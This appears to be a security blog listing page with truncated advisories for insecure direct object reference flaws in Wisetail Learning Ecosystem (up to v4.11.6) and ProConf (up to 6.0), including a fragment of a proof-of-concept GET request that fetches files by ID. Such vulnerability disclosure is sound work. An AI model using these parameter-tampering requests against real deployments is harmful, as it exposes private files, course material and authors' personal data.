CategoryInsecure Direct Object Reference

Wisetail Learning Ecosystem (LE) Upto v4.11.6 Multiple IDOR Vunlerability

Description Wisetail Learning Ecosystem (LE) upto v4.11.6 suffers from multiple insecure direct object reference (IDOR) vulnerability that allows an user to download files and access the course materials. Vendor Website wisetail.com 1 wisetail.com Proof-of-Concept  // File Disclosure GET /eco_download.php?id=2639 HTTP/1.1 Host: xxxxxxx User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:63.0)...

IDOR on ProConf Peer-Review and Conference Management System

Description In ProConf version <=6.0,  an Insecure Direct Object Reference (IDOR) allows any author to view & grab all submitted papers (Title & Abstract) and their authors personal information (Name, Email, Organization & Position) by changing value of Paper ID (param pid=xxxx). Vendor Website proconf.org &amp; myproconf.org 1 proconf.org &amp; myproconf.org Proof-of...

Categories

Recent Posts